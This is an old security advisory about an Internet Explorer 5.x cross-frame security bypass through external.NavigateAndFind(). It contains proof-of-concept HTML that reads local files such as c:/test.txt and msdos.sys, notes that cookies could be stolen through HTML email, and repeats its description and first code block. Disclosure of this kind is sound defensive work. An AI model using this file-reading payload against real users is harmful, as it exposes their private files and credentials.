COMMAND

    Internet Explorer (external.NavigateAndFind() )

SYSTEMS AFFECTED

    IE 5.01

PROBLEM

    Georgi Guninski  found following.   Internet Explorer  5.01  under
    Windows 95  and 5.0  under WinNT  4.0 (suppose  other versions are
    also  vulnerable)  allows  circumventing  "Cross  frame   security
    policy"  by  using  external.NavigateAndFind().   This exposes the
    whole DOM of the target document.  This allows reading local  text
    and HTML files and files  from any host (suppose reading  files of
    any type is possible), getting cookies (that is dangerous  because
    may get passwords, etc.) and  other sensitive information.  It  is
    also possible in some cases  to read files behind firewall.   This
    vulnerability  may  be  exploited  using  HTML  email message or a
    newsgroup posting.

    window.external.NavigateAndFind() is used to search for strings in
    specified URLs displaying  the result in  a specified frame.   The
    problem  is  it  allows  searching  in  "javascript:"  URLs  in  a
    specified frame.  In this  case the code in the  "javascript:" URL
    is executed in  the security context  of the target  frame and the
    code  has  access  to  the  document  loaded  in the target frame.
    Examine the code below for more information.

    The code is:

        <IFRAME NAME="I1" SRC="file://c:/test.txt"></IFRAME>
        <SCRIPT>
        function f()
        {
        window.external.NavigateAndFind("javascript:alert(document.body.innerText);","ll","I1");
        }
        setTimeout("f()",2000);
        </SCRIPT>

    Demonstration is available at

        http://www.nat.bg/~joro/navan.html

    Scott  Morris  altered  the  script  to  the  following, and under
    Netscape 4.06, it  caused Win95B to  reboot immediately.   He also
    tried it  under IE4.0,  and it  loaded the  msdos.sys file  to the
    text window, as expected.

        <html>
        <IFRAME NAME="I1" SRC="file://c:/msdos.sys"></IFRAME>
        <SCRIPT>
        function f()
        {
        window.external.NavigateAndFind("javascript:alert(document.body.innerText);","ll","I1");
        }
        setTimeout("f()",2000);
        </SCRIPT>

    Internet Explorer 5.01  under Windows 95  and 5.0 under  WinNT 4.0
    (suppose other versions are also vulnerable) allows  circumventing
    "Cross frame security policy" by using external.NavigateAndFind().
    This exposes the  whole DOM of  the target document.   This allows
    reading  local  text  and  HTML  files  and  files  from  any host
    (suppose reading files of  any type is possible),  getting cookies
    (that  is  dangerous  because  may  get passwords, etc.) and other
    sensitive information.  It is also possible in some cases to  read
    files behind firewall.  This vulnerability may be exploited  using
    HTML email message or a newsgroup posting.

    window.external.NavigateAndFind() is used to search for strings in
    specified  URLs  displaying  the  result  in  a  specified  frame.
    The problem  is it  allows searching  in "javascript:"  URLs in  a
    specified frame.  In this  case the code in the  "javascript:" URL
    is executed in  the security context  of the target  frame and the
    code  has  access  to  the  document  loaded  in the target frame.
    Examine the code below for more information.  The code is:

        <IFRAME NAME="I1" SRC="file://c:/test.txt"></IFRAME>
        <SCRIPT>
        function f()
        {
        window.external.NavigateAndFind("javascript:alert(document.body.innerText);","ll","I1");
        }
        setTimeout("f()",2000);
        </SCRIPT>

SOLUTION

    Disable Active Scripting